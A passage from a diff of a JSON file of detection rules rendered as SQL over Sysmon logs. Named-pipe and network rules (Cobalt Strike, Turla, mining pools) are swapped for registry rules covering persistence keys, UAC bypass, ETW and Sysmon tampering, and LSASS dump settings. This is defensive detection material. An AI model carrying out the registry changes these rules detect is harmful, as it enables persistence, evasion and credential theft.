ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" + }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": 